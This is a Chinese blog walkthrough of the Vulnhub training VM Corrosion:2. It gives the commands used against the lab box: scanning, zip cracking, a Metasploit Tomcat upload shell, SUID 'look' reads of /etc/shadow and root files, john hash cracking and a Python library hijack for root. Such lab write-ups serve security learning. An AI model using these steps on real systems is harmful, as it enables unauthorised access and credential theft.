看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2

简介: 看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。



这是一个漏洞靶机,老样子需要找到flag即可。

Difficulty: Medium

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/corrosion/Corrosion2.ova



Vulnhub靶机安装:

下载好了把安装包解压 然后使用VMware打开即可。


Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机



使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.100

渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.100

开启了22、80、8080端口 8080发现开启了tomcat服务
老样子访问80端口(Apache默认页面)进行扫描:dirb、dirsearch、whatweb、gobuster、nikto

dirsearch -u http://192.168.0.100  #没有可以利用的信息(一般没有可以利用信息就扫二级目录)
dirsearch -u http://192.168.0.100:8080 #这波信息收集得到了backup.zip和readme.txt文件
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip  #没有可以利用的信息
gobuster dir -u http://192.168.0.100:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 400,404 
whatweb



4e06a0df98304a669321687dfb8e660e.png

ebd15a33d18244eb8cdf1551cc34bfaf.png


0c73a851059e4a9eb7da90ea808727f9.png


得到一个账号:randy 下载backup.zip发现需要密码尝试爆破和Corrosion1一样 得到密码:@administrator_hi5

可以参考Corrosion系列第一篇有详细方法:http://t.csdn.cn/XmjAR




aef9757067ee4759ae413255df82777f.png

11b053be6b8c46b591bfe8fb88e55d22.png


查看配置文件 tomcat-users.xml,找到两组账户密码分别为:manager/melehifokivaiadmin/melehifokivai尝试登入,登入成功!

②:Tomcat msf 上传漏洞拿到shell:

打开msfconsole控制台使用模块:use exploit/multi/http/tomcat_mgr_upload 设置参数

set RHOST 192.168.0.100
set HttpPassword  melehifokivai
set HttpUsername  manager
set RPORT  80  
run


0514c884af5d46248fc612429687f6a9.png

bb63bd9a76134282b41360c631ccacf8.png

切换Shell,家里面下面三个用户jaye没权限进入randy用户查看user.txt得到第一个flag!


828ee7d6ed04401987fd8bce3a895c04.png

尝试切换jaye用户,试了一下tomcat的密码 进去了神奇! 使用python获取终端:python3 -c 'import pty;pty.spawn("/bin/bash")'


cat /etc/passwd 发现有ssh 那我们就切换使用ssh登入这样操作方便点!


使用命令查看有root可以执行的命令:find / -perm -u=s -type f 2>/dev/null


③:look越权操作:

这里发现了一个look命令可以使用(第一次使用,不会啊~)看不了没权限 运行./look '' "$LFILE"查看的

文件名即可。


look越权命令使用方法:https://gtfobins.github.io/gtfobins/look/



其实这里直接可以使用这个越权命令查看root文件了 ./look '' /root/root.txt

查看/etc/shadow/ect/passwd文件,unshadow命令生成需要破解的密码全部复制然后john进行爆破


(必须要复制两个文件的全部内容不然出不来)字典是:rockyou.txt(时间比较久!!)

unshadow passwd shadow > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt  

c60a1042c0b84fecb6750cfe5e7b3df3.png


1e06cbe4aca84976bda6325046220722.png

得到randy得密码为:07051986randy

④:sudo执行Base64.py提权

登入成功后信息收集一波:id,whoami,sudo-l 发现可以执行randombase64这个py脚本



5c673142ff784bbab0f68e368706c6c3.png

我们直接在python程序 base64 模块里面写入shell先找到这个脚本然后使用vi或者nano编辑器 ctrl+X 推出(第一次用搞半天)

cd /usr/lib/python3.8
ls -al base*  #找到base64.py 写入下面得内容
import os
os.system("bin/bash")
sudo /usr/bin/python3.8  /home/randy/randombase64.py #运行即可 因为使用得是pyton3.8 也可以尝试别的成功即可!!

592e7087823d402492dc1d0eba88f0d1.png


a352292c06b64060b4d5254fdba7b17e.png


e434a05a16a449e68b6461f5d6716be2.png

⑤:获取LFAGL:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!


Vulnhub靶机渗透总结:

这个靶机难度中偏上 因为比较麻烦


1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息

2.MSF exploit/multi/http/tomcat_mgr_upload模块getshell(要知道账号密码)

3.zip2john爆破和fcrackzip(爆破压缩包工具)还有john报错解决方法(新知识点!)

4.look命令越权读取文件 ./look '' 文件名即可

5.unshadow用户密码破解工具(第一次用 新工具!!)

6.sudo 提权执行base64.py写入shell提权

7.Linux Polkit 权限提升漏洞 CVE-2021-4034(太晚了睡觉了这里就先不演示了大家可以了解一下)


Corrosion系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
4月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
139 0
|
4月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
78 0
|
4月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
61 0
|
4月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
47 0
|
4月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
156 0
|
11月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
265 0
|
4天前
|
网络协议 测试技术 网络安全
Python进行Socket接口测试的实现
在现代软件开发中,网络通信是不可或缺的一部分。无论是传输数据、获取信息还是实现实时通讯,都离不开可靠的网络连接和有效的数据交换机制。而在网络编程的基础中,Socket(套接字)技术扮演了重要角色。 Socket 允许计算机上的程序通过网络进行通信,它是网络通信的基础。Python 提供了强大且易于使用的 socket 模块,使开发者能够轻松地创建客户端和服务器应用,实现数据传输和交互。 本文将深入探讨如何利用 Python 编程语言来进行 Socket 接口测试。我们将从基础概念开始介绍,逐步引导大家掌握创建、测试和优化 socket 接口的关键技能。希望本文可以给大家的工作带来一些帮助~
|
7天前
|
网络协议 测试技术 网络安全
Python进行Socket接口测试的实现
在现代软件开发中,网络通信是不可或缺的一部分。无论是传输数据、获取信息还是实现实时通讯,都离不开可靠的网络连接和有效的数据交换机制。而在网络编程的基础中,Socket(套接字)技术扮演了重要角色。 Socket 允许计算机上的程序通过网络进行通信,它是网络通信的基础。Python 提供了强大且易于使用的 socket 模块,使开发者能够轻松地创建客户端和服务器应用,实现数据传输和交互。 本文将深入探讨如何利用 Python 编程语言来进行 Socket 接口测试。我们将从基础概念开始介绍,逐步引导大家掌握创建、测试和优化 socket 接口的关键技能。希望本文可以给大家的工作带来一些帮助~
|
7天前
|
SQL Java 测试技术
SpringBoot单元测试快速写法问题之PorkService 接口中的 getPork 方法的作用如何解决
SpringBoot单元测试快速写法问题之PorkService 接口中的 getPork 方法的作用如何解决
|
9天前
|
XML Web App开发 数据挖掘
Postman接口测试工具全解析:功能、脚本编写及优缺点探讨
文章详细分析了Postman接口测试工具的功能、脚本编写、使用场景以及优缺点,强调了其在接口自动化测试中的强大能力,同时指出了其在性能分析方面的不足,并建议根据项目需求和个人偏好选择合适的接口测试工具。
15 1

热门文章

最新文章

下一篇
云函数